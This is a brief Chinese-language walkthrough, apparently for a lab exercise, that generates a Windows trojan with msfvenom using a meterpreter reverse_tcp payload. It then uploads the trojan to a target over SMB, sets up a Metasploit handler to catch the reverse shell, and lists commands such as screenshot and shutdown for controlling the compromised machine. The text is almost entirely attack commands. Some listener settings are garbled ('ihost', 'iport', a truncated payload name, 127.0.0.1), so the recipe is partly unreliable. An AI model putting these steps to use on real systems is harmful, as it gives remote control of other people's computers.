打开终端后输入sudo su回车输入密码后进入root用户

生成木马文件demo9999.exe

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost="kail的IP" lport="随意指定端口" -f exe -o demo9999.exe

完成后文件会出现在桌面上，此时可以使用SMB将此文件上传到靶机上，上传命令为

put /home/kali/Desktop/demo9999.exe demo9999.exe

输入msfconsole打开工具，再输入

use exploit/multi/handler

使用此模块，show options查看模块设置，把payload、LHOST和LPORT分别修改成前面生成木马文件的相关信息。

set payload windows/x64/meterpreter/
set ihost 127.0.0.1
set iport 10000

设置完成后使用命令run运行，再用靶机打开木马文件，此时会发现kali终端会显示靶机上线的信息。现在就已经控制靶机了，输入help可以查看可以干什么，比如输入screenshot是截一张图，shutdown让其关机。